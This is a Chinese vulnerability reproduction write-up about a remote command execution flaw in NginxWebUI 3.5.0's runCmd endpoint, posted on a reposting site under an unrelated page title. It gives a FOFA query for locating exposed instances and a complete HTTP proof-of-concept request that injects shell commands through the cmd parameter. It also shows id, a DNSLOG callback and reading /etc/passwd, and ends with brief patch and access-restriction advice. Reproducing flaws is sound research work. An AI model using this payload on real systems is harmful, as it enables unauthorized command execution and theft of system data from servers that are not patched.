住房和城乡建设部网站村镇建设网站开发工作介绍
news/
2025/9/23 8:30:54/
文章来源:
住房和城乡建设部网站村镇建设,网站开发工作介绍,网站不备案做优化,网站自动加水印文章目录 NginxWebUI runCmd 远程命令执行漏洞复现 [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现 0x06 修复建议 NginxWebUI runCmd 远程命令执行漏洞复现 [附POC]
0x01 前言
免责声明#xff1a;请勿利用文章内的相… 文章目录 NginxWebUI runCmd 远程命令执行漏洞复现 [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现 0x06 修复建议 NginxWebUI runCmd 远程命令执行漏洞复现 [附POC]
0x01 前言
免责声明请勿利用文章内的相关技术从事非法测试由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失均由使用者本人负责所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用
0x02 漏洞描述
nginxWebUI是一款图形化管理nginx配置的工具能通过网页快速配置nginx的各种功能包括HTTP和TCP协议转发、反向代理、负载均衡、静态HTML服务器以及SSL证书的自动申请、续签和配置配置完成后可以一键生成nginx.conf文件并控制nginx使用此文件进行启动和重载。
nginxWebUI是一款网页版开源工具。 nginxWebUI存在命令执行漏洞。攻击者可利用漏洞执行系统任意命令。
0x03 影响版本
nginxWebUI 3.5.00x04 漏洞环境
FOFA语法body“nginxWebUI”
0x05 漏洞复现
1.访问漏洞环境 2.构造POC
POC GET
GET /AdminPage/conf/runCmd?cmd执行的命令%26%26echo%20nginx HTTP/1.1
Host: ip:port
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.03.复现
执行id命令。 使用DNSLOG测试一下
发现有记录产生。
执行命令cat/etc/passwd
0x06 修复建议
一、安全修复方案 官方已发布相关升级内容详细可以参考https://www.nginxwebui.cn/
二、临时缓解方案 利用安全组功能设置 nginxWebUI 仅对可信地址开放
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/911910.shtml
如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!